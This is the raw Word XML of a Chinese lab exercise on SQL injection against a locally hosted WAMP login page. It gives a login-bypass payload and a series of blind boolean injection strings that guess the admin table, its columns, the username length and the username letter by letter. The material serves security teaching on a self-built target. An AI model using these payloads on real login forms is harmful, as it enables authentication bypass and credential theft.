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9C5D" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824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wamp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，启动所有服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，“start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services”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A7ED8" w14:textId="24F891F4" w:rsidR="00824CCF" w:rsidRDefault="00C50CA8" w:rsidP="00824CC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4105C" wp14:editId="1BB1520F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2241779</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1225946</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="806471" cy="167889"/>
                <wp:effectExtent l="0" t="0" r="12700" b="228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71" cy="1678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EACF7" id="椭圆 1" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:176.5pt;margin-top:96.55pt;width:63.5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" filled="f" strokecolor="#ed7d31 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00824CCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E9B5595" wp14:editId="782EF7AA">
            <wp:extent cx="1411834" cy="18716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843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03" cy="18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CE4" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824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t>phpmyadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，新建数据库test，导入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36E80D" w14:textId="3EC3473F" w:rsidR="00824CCF" w:rsidRDefault="00C50CA8" w:rsidP="00824CC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0FFB2" wp14:editId="56303B04">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>883670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>629587</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="248837" cy="194872"/>
                <wp:effectExtent l="0" t="0" r="18415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7" cy="1948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750F6" id="椭圆 5" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:69.6pt;margin-top:49.55pt;width:19.6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" filled="f" strokecolor="#ed7d31 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00824CCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE019FD" wp14:editId="7C51C1AB">
            <wp:extent cx="5274310" cy="2685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8918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0AA" w14:textId="2AFBF4AE" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824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verify</w:t>
      </w:r>
      <w:r>
        <w:t>.phpf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入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的www文件夹。</w:t>
      </w:r>
      <w:r w:rsidR="00197965">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidR="00DD099E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DD099E">
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>localhost/login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可看到登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629930B5" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824CCF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677FB741" wp14:editId="29A61573">
            <wp:extent cx="3043123" cy="196330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844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09" cy="20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7FA0" w14:textId="142E19E3" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824C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测试：用户名输入“‘ or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1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#”，登录成功</w:t>
      </w:r>
      <w:r w:rsidR="00BE47F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入“’and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1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#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不报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018CD30" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00927B7F" w:rsidP="00824CCF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00927B7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00927B7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00927B7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidR="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3D93B" w14:textId="109C6323" w:rsidR="00927B7F" w:rsidRDefault="00927B7F" w:rsidP="00A90C87">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00927B7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入： </w:t>
      </w:r>
      <w:r w:rsidRPr="00927B7F">
        <w:t>’ and exists (select * from admin)#</w:t>
      </w:r>
      <w:r w:rsidR="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D53008" w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意思是猜测</w:t>
      </w:r>
      <w:r w:rsidR="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="00D53008" w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有个</w:t>
      </w:r>
      <w:r w:rsidR="00D53008" w:rsidRPr="00D53008">
        <w:t>admi</w:t>
      </w:r>
      <w:r w:rsidR="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00D53008" w:rsidRPr="00D53008">
        <w:t>表段，页面返回正常，说明猜对了。当然也可能错误返回，这时就要看猜测的本事了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54A1BE" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00824CCF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测管理员表表中的字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C168D20" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">接下来猜测管理员表中是否有一个ID段，在末尾加上： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">and exists (select id from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">admin) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>页面返回正常,说明admin表中有个id的字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D672E5" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t>继续：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>and exists (select username from admin)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>这里的意思是看admin表中是否有 username字段，页面返回正常,说明在admin中有一个username字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580EB179" w14:textId="241940C4" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t>继续猜存放密码的字段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> and exists (select password from admin)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>返回正常的页面,说明admin表中有个password字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118453CE" w14:textId="46BB62B9" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好了，到此可以知道</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>admin表中至少有如下三个字段：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D53008">
        <w:t>id,username,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D53008">
        <w:t>，这各命名方式与普通程序员的命名方法一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28682D6D" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测用户名和密码的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D8043" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">为了下面方便进行，首先猜他的管理员的id值： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> and exists (select id from admin where id=1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>意思是看看admin表中是否有一个id=1的值，结果返回是的正常的页面,说明猜对了！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC71F09" w14:textId="0586C5AA" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t>接着猜ID为1的用户名长度：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> and exists (select id from admin where len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gth</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">(username)&lt;6 and id=1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">这里猜管理员用户名长度小于6，返回了正常的页面，说明名字不是太长，可以用 1~5 各个长度一一实验，直到： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> and exists (select id from admin where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D53008">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">(username)=5 and id=1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>返回了正常的页面,说明用户名的长度已经猜出了为5。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9A858" w14:textId="77777777" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59B2D9" w14:textId="50EA80DA" w:rsidR="00D53008" w:rsidRDefault="00D53008" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53008">
        <w:t>方法是，在后面加上：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve">and 1=(select id from </w:t>
      </w:r>
      <w:r w:rsidR="007654CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> where mid(username,1,1)</w:t>
      </w:r>
      <w:r w:rsidR="007654CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=‘a’#。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> 其中，</w:t>
      </w:r>
      <w:r w:rsidR="007654CA" w:rsidRPr="00D53008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>mid 函数的功能是截取username字段值的字串，从第1位开始，截取的长度是1。 这里做的意思是，猜测用户名的第一个字</w:t>
      </w:r>
      <w:r w:rsidR="007654CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符为a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53008">
        <w:t>结果返回了正常页面，说明之前的猜想是正确的</w:t>
      </w:r>
      <w:r w:rsidR="007654CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E1239" w14:textId="0E6BA45C" w:rsidR="007654CA" w:rsidRDefault="007654CA" w:rsidP="00D53008">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007654CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来猜测，用户名很有可能就是</w:t>
      </w:r>
      <w:r w:rsidRPr="007654CA">
        <w:t>admin，因为它正好是五位。为了证明这个猜测，用如下方法测试：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="007654CA">
        <w:t xml:space="preserve"> and 1=(select id from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="007654CA">
        <w:t xml:space="preserve"> where username='admin') 返回正常页面，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidRPr="007654CA">
        <w:t>用户名就是admin。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2D7DF" w14:textId="37097CAF" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="0090291E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B404913" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824CCF"/>
    <w:p w14:paraId="5C40272E" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824CCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C0247" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824C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与书本内容不同，测试时需要在最前加上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，其作用是将前一个字符串类型的变量的引号补全，最后加上#，其作用是将S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句最后的引号注释掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47602D38" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824CC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函数，可用length函数代替。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB38580" w14:textId="77777777" w:rsidR="00824CCF" w:rsidRDefault="00824CCF" w:rsidP="00824CC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函数，考虑不通过A</w:t>
      </w:r>
      <w:r>
        <w:t>SCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码直接猜测字母。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35155645" w14:textId="02CABD9E" w:rsidR="00824CCF" w:rsidRPr="00B76FAB" w:rsidRDefault="00824CCF" w:rsidP="00824C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提示，猜测用户名处，当已经猜到用户表名字时不用再嵌套搜索，因此</w:t>
      </w:r>
      <w:r w:rsidR="0018571F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改为如下语句： </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’ and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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(select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mid</w:t>
      </w:r>
      <w:r>
        <w:t>(username,1,1)=’a’#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2C964" w14:textId="77777777" w:rsidR="00F20584" w:rsidRPr="00824CCF" w:rsidRDefault="00F20584"/>
    <w:sectPr w:rsidR="00F20584" w:rsidRPr="0082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3644" w14:textId="77777777" w:rsidR="00527317" w:rsidRDefault="00527317" w:rsidP="00824CCF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49C88BCD" w14:textId="77777777" w:rsidR="00527317" w:rsidRDefault="00527317" w:rsidP="0082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B35C8" w14:textId="77777777" w:rsidR="00527317" w:rsidRDefault="00527317" w:rsidP="00824CCF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3B82D477" w14:textId="77777777" w:rsidR="00527317" w:rsidRDefault="00527317" w:rsidP="0082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E4591"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DF6AA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E87BDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E45C1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8"/>
    <w:rsid w:val="0018571F"/>
    <w:rsid w:val="00197965"/>
    <w:rsid w:val="00527317"/>
    <w:rsid w:val="007654CA"/>
    <w:rsid w:val="007A6D8A"/>
    <w:rsid w:val="00824CCF"/>
    <w:rsid w:val="008A6FA4"/>
    <w:rsid w:val="0090291E"/>
    <w:rsid w:val="00927B7F"/>
    <w:rsid w:val="00A90C87"/>
    <w:rsid w:val="00B40268"/>
    <w:rsid w:val="00BE47F8"/>
    <w:rsid w:val="00C50CA8"/>
    <w:rsid w:val="00D53008"/>
    <w:rsid w:val="00DD099E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5B743F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7A7234CE-8E9B-4A19-86CD-CDC8CDE7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CC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CF"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00824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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-03T12:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-03T12:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>